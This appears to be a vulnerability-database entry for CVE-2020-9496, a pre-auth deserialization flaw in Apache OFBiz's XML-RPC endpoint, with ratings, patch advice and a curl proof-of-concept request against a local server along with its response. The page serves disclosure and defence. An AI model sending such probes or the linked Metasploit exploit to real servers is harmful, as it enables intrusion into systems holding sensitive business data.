Attacker Value
Very High
(2 users assessed)
Exploitability
Very High
(2 users assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
2

CVE-2020-9496

Disclosure Date: July 15, 2020
Add any MITRE ATT&CK Tactics to the list below that apply to this CVE.

Description

XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03

Add Assessment

4
Ratings
Technical Analysis

Pre-auth RCE in ERP software that’s free and isn’t SAP? Sweet. And it’s a long-standing Apache project that’s often recommended. Here’s a PoC:

wvu@kharak:~$ curl -vH "Content-Type: text/xml" http://127.0.0.1:8080/webtools/control/xmlrpc -d '<?xml version="1.0"?><methodCall><methodName>foo</methodName><params><param><value><struct><member><name>bar</name><value><serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable></value></member></struct></value></param></params></methodCall>'
*   Trying 127.0.0.1...
* TCP_NODELAY set
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST /webtools/control/xmlrpc HTTP/1.1
> Host: 127.0.0.1:8080
> User-Agent: curl/7.64.1
> Accept: */*
> Content-Type: text/xml
> Content-Length: 273
>
* upload completely sent off: 273 out of 273 bytes
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=D090A373F50D50CF8CFCF2F9E301D04A.jvm1; Path=/webtools/; Secure; HttpOnly
< Set-Cookie: OFBiz.Visitor=10221; Expires=Fri, 13-Aug-2021 19:57:20 GMT; Path=/
< Content-Type: text/xml;charset=UTF-8
< Transfer-Encoding: chunked
< Vary: Accept-Encoding
< Date: Thu, 13 Aug 2020 19:57:20 GMT
<
* Connection #0 to host 127.0.0.1 left intact
<?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><fault><value><struct><member><name>faultCode</name><value><i4>0</i4></value></member><member><name>faultString</name><value>Failed to read result object: null</value></member></struct></value></fault></methodResponse>* Closing connection 0
wvu@kharak:~$

A lot of orgs rely on ERP software, and you’re bound to find sensitive information in an ERP system. Note that these systems will likely be inside the network perimeter. High value for pentesters on an internal, I’d say.

Note that the CVE seems to conflate this with XSS. CVSS score seems lower than I’d expect.

ETA: Here’s an exploit: https://github.com/rapid7/metasploit-framework/pull/14000.

2
Ratings
Technical Analysis

This was patched in the July 2020 release of OFBiz 17.12.04.

If your business/org runs Apache OFBiz, now is a good time to update to 17.12.04.

General Information

Products

  • Apache OFBiz
Technical Analysis